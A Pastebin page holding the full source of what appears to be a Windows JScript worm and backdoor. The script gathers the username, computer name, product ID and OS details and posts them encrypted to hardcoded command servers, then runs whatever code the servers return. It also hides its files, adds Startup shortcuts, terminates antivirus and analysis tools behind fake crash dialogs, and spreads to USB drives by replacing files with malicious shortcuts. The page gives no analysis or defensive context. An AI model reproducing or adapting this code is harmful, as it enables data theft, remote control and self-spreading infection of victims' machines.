Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- (function () {
- var _ = {
- v: '525',
- a: '',
- t: '0'
- };
- var a = new ActiveXObject('wscript.shell'), b = new ActiveXObject('scripting.filesystemobject'), h = function () {
- return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1);
- }, d = a.environment('process'), f = d('username'), g = d('computername'), ru = new ActiveXObject('shell.application'), lo = [], fup = [], dod = '', dot = 0, hf = function (e) {
- {
- var n;
- try {
- var t = b.getFolder(e);
- t.attributes = 2;
- } catch (_n) {
- n = _n;
- {
- }
- }
- }
- }, sc = function (e) {
- e += '';
- var t = 0;
- for (var n = 0; n < e.length; n++)
- t = (t << 5) - t + e.charCodeAt(n), t &= t;
- return Math.abs(t);
- }, ha = function (e) {
- var t = '', n = sc(e);
- for (var r = 0; r < sc(e) % 5 + 5; r++)
- n = sc(t + n), t += String.fromCharCode(n % 25 + 97);
- return t;
- };
- var zzo = function () {
- var ttw = [
- 'http://www.microsoft.com/',
- 'http://www.google.com/',
- 'http://www.bing.com/'
- ];
- for (var i = 0, h, wep; i < ttw.length; i++) {
- {
- var e;
- try {
- var h = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
- h.open('GET', ttw[i]);
- h.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
- h.setRequestHeader('Cache-Control', 'no-cache');
- h.setRequestHeader('Pragma', 'no-cache');
- h.setRequestHeader('Connection', 'close');
- h.send('');
- wep = new Date(h.getAllResponseHeaders().split('Date: ').pop().split('\n').shift()).getTime() / 1000;
- if (1388534400 < wep) {
- return wep;
- }
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- }
- return false;
- };
- var ent = function (efn) {
- {
- var e;
- try {
- a.run('%comspec% /c cacls "' + efn + '" /T /E /G Users:F /C', 0, true);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- }, hr = function (e) {
- if (e)
- var t = 1, n = 1;
- else
- var t = 2, n = 0;
- {
- var r;
- try {
- a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden', t, 'REG_DWORD');
- } catch (_r) {
- r = _r;
- {
- }
- }
- }
- {
- var r;
- try {
- a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden', n, 'REG_DWORD');
- } catch (_r) {
- r = _r;
- {
- }
- }
- }
- };
- var rc = function (key, str) {
- var s = [], j = 0, x, res = '';
- for (var i = 0; i < 256; i++) {
- s[i] = i;
- }
- for (i = 0; i < 256; i++) {
- j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
- x = s[i];
- s[i] = s[j];
- s[j] = x;
- }
- i = 0;
- j = 0;
- for (var y = 0; y < str.length; y++) {
- i = (i + 1) % 256;
- j = (j + s[i]) % 256;
- x = s[i];
- s[i] = s[j];
- s[j] = x;
- res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
- }
- return res;
- };
- var cob = function () {
- return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
- };
- var kk = 1;
- var zbo = [
- 'regedit',
- 'windows-kb',
- 'mrt',
- 'rstrui',
- 'msconfig',
- 'procexp',
- 'avast',
- 'avg',
- 'mse',
- 'ptinstall',
- 'sdasetup',
- 'issetup',
- 'fs20',
- 'mbam',
- 'housecall',
- 'hijackthis',
- 'rubotted',
- 'autoruns',
- 'avenger',
- 'filemon',
- 'gmer',
- 'hotfix',
- 'klwk',
- 'mbsa',
- 'procmon',
- 'regmon',
- 'sysclean',
- 'tcpview',
- 'unlocker',
- 'wireshark',
- 'fiddler',
- 'resmon',
- 'perfmon',
- 'msss',
- 'cleaner',
- 'otl',
- 'roguekiller',
- 'fss',
- 'zoek',
- 'emergencykit',
- 'dds',
- 'ccsetup',
- 'vbsvbe',
- 'combofix',
- 'frst',
- 'mcshield',
- 'zphdiag'
- ];
- var eth = function (str) {
- var r = [];
- var rr = '';
- var e = str.length;
- var c = 0;
- var h;
- var x = 'HsrPWXkyVtmGUTRzuqLiIZlJhjpQnvNwMogYKOSx'.split('');
- while (c < e) {
- h = str.charCodeAt(c++).toString(16);
- while (h.length < 2)
- h = '0' + h;
- r.push(h);
- }
- for (var i = 0; i < r.length; i++) {
- if (Math.round(Math.random() * 1))
- rr += pw(x);
- rr += r[i];
- if (Math.round(Math.random() * 1))
- rr += pw(x);
- }
- return rr;
- };
- var shh = function (o) {
- for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
- return o;
- };
- var kp = function () {
- if (b.fileExists(ofb + ha(g + '09')))
- WScript.quit();
- };
- var zt = function () {
- {
- var e;
- try {
- var t = b.openTextFile(ofb + ha(g + '00'), 8, !0);
- t.close();
- a.run('%comspec% /c shutdown /p /f', 0);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- };
- var fuu = function () {
- var ttt = [];
- for (var i = new Enumerator(b.getFolder(ofb).Files); !i.atEnd(); i.moveNext()) {
- if (b.getExtensionName(i.item().Name) == 'exe')
- ttt.push(ofb + i.item().Name);
- }
- return ttt;
- };
- var sha = function (too) {
- for (var i = 0; i < lo.length; i++) {
- if (too) {
- {
- var e;
- try {
- fup[lo[i]] = b.openTextFile(lo[i], 8, !0);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- } else {
- {
- var e;
- try {
- fup[lo[i]].close();
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- }
- }
- };
- var dof = function () {
- if (dod != '' && dot + 60 * 60 * 6 * 1000 >= new Date().getTime()) {
- return dod;
- } else {
- var doh = shh([
- 'http://www.nycnote.in/',
- 'http://95.153.31.22/',
- 'http://95.153.31.18/',
- 'http://www.nycnote.pw/'
- ]);
- var dec = '';
- for (var doi = 0; doi < doh.length; doi++) {
- {
- var e;
- try {
- $('asl', doh[doi]);
- var hgf = zxcvb;
- dec = doh[doi];
- } catch (_e) {
- e = _e;
- {
- }
- } finally {
- delete zxcvb;
- delete hgf;
- }
- }
- if (dec != '')
- break;
- }
- if (dec == '') {
- return false;
- } else {
- dod = dec;
- dot = new Date().getTime();
- return dod;
- }
- }
- };
- var $ = function (fab, fat) {
- var m = ofb + ha(g + '06');
- var q = [
- 'a',
- 'b',
- 'c',
- 'd',
- 'e',
- 'f',
- 'g',
- 'h',
- 'i',
- 'j',
- 'k',
- 'l',
- 'm',
- 'n',
- 'o',
- 'p',
- 'q',
- 'r',
- 's',
- 't',
- 'u',
- 'v',
- 'w',
- 'x',
- 'y',
- 'z',
- '0',
- '1',
- '2',
- '3',
- '4',
- '5',
- '6',
- '7',
- '8',
- '9'
- ];
- var s = '';
- for (var r = 0; r < 26; r++)
- s += q[Math.round(Math.random() * 35)];
- var v = eth(rc(s, fab + ';v=' + _.v + '&a=' + _.a + '&t=' + _.t + '&u=' + escape(f) + '&c=' + escape(g) + '&p=' + escape(w) + '&i=' + escape(tff) + '&e=' + escape(ll.join('-')) + '&b=' + escape(vn.join('.')) + '&s=' + escape(su)));
- var yun = fat === 1 ? dof() : fat;
- if (yun == false)
- throw Error();
- var j = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
- j.open('POST', yun);
- j.setRequestHeader('Cache-Control', 'no-cache');
- j.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
- j.setRequestHeader('Content-Length', v.length);
- j.setRequestHeader('Cookie', 'PHPSESSID=' + s);
- j.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
- j.setRequestHeader('Pragma', 'no-cache');
- j.setRequestHeader('Connection', 'close');
- j.send(v);
- var c = new ActiveXObject('ADODB.Stream');
- c.mode = 3;
- c.type = 1;
- c.open();
- c.write(j.responseBody);
- c.saveToFile(m, 2);
- var k = b.openTextFile(m, 1);
- var l = k.readAll();
- k.close();
- {
- var e;
- try {
- b.deleteFile(m);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- var c, out = '', key = [];
- l = l.split('<!-- ').pop().split(' -->').shift().split('');
- for (var i = 0; i < 5; i++)
- key.push(l.shift().charCodeAt(0) - 32);
- for (var i = 0; i < l.length; i++) {
- c = l[i].charCodeAt(0) - key[i % key.length];
- out += String.fromCharCode(c < 32 ? 95 + c : c);
- }
- {
- var e;
- try {
- eval(rewrite(out, true));
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- };
- var sk = function () {
- var foc = 0;
- {
- var e;
- try {
- var cbo = ofb + ha(g + '11');
- var t = b.openTextFile(cbo, 8, !0);
- t.close();
- ent(cbo);
- if (!foc)
- sha(0);
- foc++;
- ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '10'), '', '', 0);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- {
- var e;
- try {
- var cbo = ofb + ha(g + '13');
- var t = b.openTextFile(cbo, 8, !0);
- t.close();
- ent(cbo);
- if (!foc)
- sha(0);
- foc++;
- ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '12'), '', '', 0);
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- if (foc) {
- WScript.sleep(1500);
- sha(1);
- }
- };
- var pw = function (mp) {
- return mp[Math.floor(Math.random() * mp.length)];
- };
- var w = '000';
- {
- var e;
- try {
- w = a.regRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID');
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- var vn = [
- 0,
- 0,
- 0,
- 0
- ];
- {
- var e;
- try {
- for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
- vn = i.item()['version'].split('.');
- if (vn[0] >= 5)
- break;
- }
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- if (!vn[0])
- vn[0] = b.folderExists(d('systemdrive') + '\\Users') ? 6 : 5;
- var ll = [
- '',
- ''
- ];
- {
- var e;
- try {
- var osl;
- for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
- osl = (osl = i.item()['OSLanguage'].toString(16)).length == 4 ? osl : new Array(5 - osl.length).join('0') + osl;
- ll = a.regRead('HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\' + osl).split(';')[0].split('-');
- break;
- }
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- {
- var e;
- try {
- var w0 = [];
- var ofb = false;
- var gg = b.getFolder(d('userprofile') + '\\..\\');
- for (var i = new Enumerator(gg.SubFolders); !i.atEnd(); i.moveNext()) {
- var bfo = i.item() + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02') + '\\';
- if (b.folderExists(bfo)) {
- try {
- var ZE = b.openTextFile(bfo + ha(g + '05'), 8, !0);
- ZE.close();
- var hd = bfo + ha(g + '03'), bfi = bfo + ha(g + '04') + '.js';
- ent(bfo + '*');
- hf(bfo);
- ofb = bfo;
- try {
- b.copyFile(WScript.scriptFullName, bfi, true);
- } catch (e) {
- }
- try {
- var cvv = ofb + ha(g + '00');
- var Oq = b.openTextFile(cvv, 8, !0);
- ent(cvv);
- try {
- b.deleteFile(ofb + ha(g + '09'));
- } catch (e) {
- }
- } catch (e) {
- if (WScript.Arguments.length > 0) {
- switch (WScript.Arguments(0)) {
- case ha(g + '10'):
- var cbo = ofb + ha(g + '11');
- try {
- var zbz = b.openTextFile(cbo, 8, !0);
- } catch (e) {
- WScript.quit();
- }
- ent(cbo);
- while (true) {
- try {
- var oot = GetObject('winmgmts:root\\cimv2');
- for (var dS = new Enumerator(oot.ExecQuery('SELECT * FROM Win32_DiskDrive')); !dS.atEnd(); dS.moveNext()) {
- if (dS.item().Model.match(/usb/i)) {
- var did = dS.item().DeviceID;
- for (var dPS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskDrive.DeviceID=\'' + did + '\'} WHERE AssocClass=Win32_DiskDriveToDiskPartition')); !dPS.atEnd(); dPS.moveNext()) {
- var pID = dPS.item().DeviceID;
- for (var lDS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskPartition.DeviceID=\'' + pID + '\'} WHERE AssocClass=Win32_LogicalDiskToPartition')); !lDS.atEnd(); lDS.moveNext()) {
- var lD = lDS.item().DeviceID + '\\', trr = 'Files\\', trd = lD + trr, poor = sc(g) % 500 + 405 + '\\', por = trr + poor, pod = lD + por, piir = ha(g + '01') + '.js', pir = por + ha(g + '01') + '.js', pid = lD + pir, bat = lD + 'Files.bat';
- try {
- var gf = b.getFolder(trd);
- for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
- var ff = (fS.item() + '').split('\\').pop();
- if (ff.length == 3 && !isNaN(parseFloat(ff)) && isFinite(ff)) {
- var fg = b.getFolder(trd + ff);
- for (var Sf = new Enumerator(fg.Files); !Sf.atEnd(); Sf.moveNext()) {
- var fff = (Sf.item() + '').split('\\').pop();
- if (b.getExtensionName(fff).toLowerCase() == 'js') {
- try {
- b.copyFile(WScript.scriptFullName, trd + ff + '\\' + fff, true);
- } catch (e) {
- }
- }
- }
- }
- }
- } catch (e) {
- }
- if (b.fileExists(bfo + '0.gz') === false) {
- try {
- b.createFolder(trd);
- } catch (e) {
- }
- try {
- b.createFolder(pod);
- } catch (e) {
- }
- hf(trd), hf(pod);
- try {
- var otff = b.openTextFile(bat, 2, 1);
- otff.writeLine('cd Files\\' + poor), otff.writeLine('%homedrive%\\Windows\\System32\\cmd.exe /c start wscript ' + piir), otff.writeLine('exit'), otff.close();
- } catch (e) {
- }
- var bro = [
- 127,
- 128,
- 129
- ];
- try {
- var gf = b.getFolder(lD);
- for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
- var ff = (fS.item() + '').split(':\\').pop();
- if (ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null && ff.match(/System Volume/) == null && ff.match(/Files/) == null) {
- with (a.createShortcut(lD + ff + '.lnk'))
- targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& set xyz=explorer&& %homedrive%\\Windows\\System32\\cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c %xyz% "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + pw(bro), save();
- try {
- var t = b.getFolder(lD + ff);
- t.move(trd + ff);
- } catch (e) {
- }
- hf(trd + ff);
- }
- }
- } catch (e) {
- }
- try {
- var gf = b.getFolder(lD);
- for (var fS = new Enumerator(gf.Files); !fS.atEnd(); fS.moveNext()) {
- var ff = (fS.item() + '').split(':\\').pop();
- var exx = b.getExtensionName(ff).toLowerCase();
- if (exx != 'lnk' && exx != 'bat' && exx != '' && exx != 'js' && ff.toLowerCase() != 'autorun.inf' && ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null) {
- var exo = 0;
- switch (exx) {
- case 'exe':
- exo = 261;
- break;
- case 'doc':
- case 'docx':
- case 'pdf':
- exo = 73;
- break;
- case 'rtf':
- case 'txt':
- exo = 70;
- break;
- case 'mp3':
- case 'm4a':
- case 'ogg':
- case 'wav':
- case 'wma':
- exo = 116;
- break;
- case 'mp4':
- case 'avi':
- case 'webm':
- case 'flv':
- case 'mov':
- case 'wmv':
- case 'mpeg':
- case 'mpg':
- exo = 115;
- break;
- case 'gif':
- case 'jpg':
- case 'jpeg':
- case 'png':
- exo = 302;
- break;
- }
- with (a.createShortcut(lD + ff + '.lnk'))
- targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + exo, save();
- try {
- b.moveFile(lD + ff, trd + ff);
- } catch (e) {
- }
- hf(trd + ff);
- }
- }
- } catch (e) {
- }
- try {
- b.copyFile(WScript.scriptFullName, pid, true);
- } catch (e) {
- }
- }
- }
- }
- }
- }
- } catch (e) {
- }
- kp();
- zt();
- WScript.sleep(14000);
- }
- break;
- case ha(g + '12'):
- var cbo = ofb + ha(g + '13');
- try {
- var zbz = b.openTextFile(cbo, 8, !0);
- } catch (e) {
- WScript.quit();
- }
- ent(cbo);
- while (true) {
- try {
- var t = GetObject('winmgmts:root\\cimv2');
- for (var i = new Enumerator(t.ExecQuery('SELECT * FROM Win32_Process')); !i.atEnd(); i.moveNext()) {
- var it = i.item();
- if (it['name'].match(new RegExp(zbo.join('|'), 'i'))) {
- try {
- if (it.terminate() == 0 && it['ExecutablePath'] && !it['ExecutablePath'].match(/windows|program/i)) {
- var tp = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
- var tq = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
- a.popup('Application has generated an exception that could not be handled.\n\nProcess id=0x' + tp + ' (' + parseInt(tp, 16) + '), Thread id=0x' + tq + ' (' + parseInt(tq, 16) + ').\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.', 8, it['name'] + ' - Common Language Runtime Debugging Services', 1 + 48 + 4096);
- }
- } catch (e) {
- }
- }
- }
- } catch (e) {
- }
- kp();
- zt();
- WScript.sleep(400);
- }
- break;
- }
- }
- if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false)
- WScript.quit();
- }
- if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false) {
- try {
- a.run('%comspec% /c del /F /S /Q "' + bfo + '*.exe"', 0, true);
- WScript.sleep(500);
- } catch (e) {
- }
- ww = ha(Math.random());
- mm = Math.ceil(Math.random() * 5);
- if (mm > 3)
- ww += mm > 4 ? '64' : '32';
- ww += '.exe';
- b.copyFile(d('systemroot') + '\\system32\\wscript.exe', bfo + ww, true);
- ent(bfo + ww);
- w0.push(bfo + ww);
- } else {
- w0 = fuu();
- }
- var fet = w0[0];
- var su = 0;
- try {
- var pp = d('systemdrive') + '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
- var p = pp + 'Start.lnk';
- with (a.createShortcut(p))
- targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
- ent(p);
- su++;
- lo.push(p);
- var cbb = [
- 'Windows Explorer.lnk',
- 'empezar.lnk',
- 'atajo.lnk'
- ];
- for (var i1 = 0; i1 < cbb.length; i1++) {
- try {
- b.deleteFile(pp + cbb[i1]);
- } catch (e) {
- }
- }
- } catch (e) {
- }
- try {
- var h = b.getFolder(d('userprofile') + '\\..\\');
- for (var j = new Enumerator(h.SubFolders); !j.atEnd(); j.moveNext()) {
- var k = j.item();
- for (var i = 0; i < f.length; i++) {
- try {
- var pp = k + (vn[0] >= 6 ? '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' : '\\Start Menu\\Programs\\Startup\\');
- var p = pp + 'Start.lnk';
- with (a.createShortcut(p))
- targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
- ent(p);
- lo.push(p);
- var cbb = [
- 'Windows Explorer.lnk',
- 'empezar.lnk',
- 'atajo.lnk'
- ];
- for (var i1 = 0; i1 < cbb.length; i1++) {
- try {
- b.deleteFile(pp + cbb[i1]);
- } catch (e) {
- }
- }
- } catch (e) {
- }
- }
- }
- } catch (e) {
- }
- if (WScript.ScriptFullName.split('\\').shift() == d('systemdrive'))
- lo.push(WScript.ScriptFullName);
- var tc = d('temp') + '\\' + ha(g + '08') + '.js';
- if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) {
- try {
- b.deleteFile(tc);
- } catch (e) {
- }
- WScript.quit();
- } else if (su == 0) {
- try {
- Oq = b.openTextFile(ofb + ha(g + '00'), 8, !0);
- } catch (e) {
- }
- }
- hr(0);
- sha(1);
- sk();
- kk = 0;
- break;
- } catch (e) {
- }
- }
- }
- if (kk) {
- var bbs = d('userprofile') + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02'), bbz = bbs + '\\' + ha(g + '04') + '.js';
- try {
- b.createFolder(bbs);
- } catch (e) {
- }
- ent(bbs);
- b.copyFile(WScript.ScriptFullName, bbz, true);
- ent(bbz);
- try {
- Oq.close();
- } catch (e) {
- }
- ru.shellExecute('wscript.exe', '"' + WScript.ScriptFullName + '" ' + ha(g + '14'), '', '', 0);
- WScript.quit();
- }
- } catch (_e) {
- e = _e;
- {
- WScript.quit();
- }
- }
- }
- var tff = 'e', otf;
- if (b.fileExists(hd)) {
- {
- var e;
- try {
- otf = b.openTextFile(hd, 1);
- tff = otf.readAll(), otf.close();
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- } else {
- {
- var e;
- try {
- tff = cob() + cob() + '-' + cob() + '-' + cob() + '-' + cob() + '-' + cob() + cob() + cob();
- otf = b.openTextFile(hd, 2, 1);
- otf.write(tff), otf.close();
- } catch (_e) {
- e = _e;
- {
- }
- }
- }
- }
- ent(hd);
- while (true) {
- if (zzo() !== false) {
- while (true) {
- {
- var e;
- try {
- $('', 1);
- for (var i = new Date().getTime(); i + 60 * 53 * 1000 >= new Date().getTime(); sk())
- WScript.sleep(2000);
- } catch (_e) {
- e = _e;
- {
- if (zzo() == false)
- break;
- for (var i = new Date().getTime(); i + 8000 >= new Date().getTime(); sk())
- WScript.sleep(2000);
- }
- }
- }
- }
- } else {
- for (var i = new Date().getTime(); i + 60 * 3 * 1000 >= new Date().getTime(); sk())
- WScript.sleep(2000);
- }
- }
- }());
Advertisement
Add Comment
Please, Sign In to add comment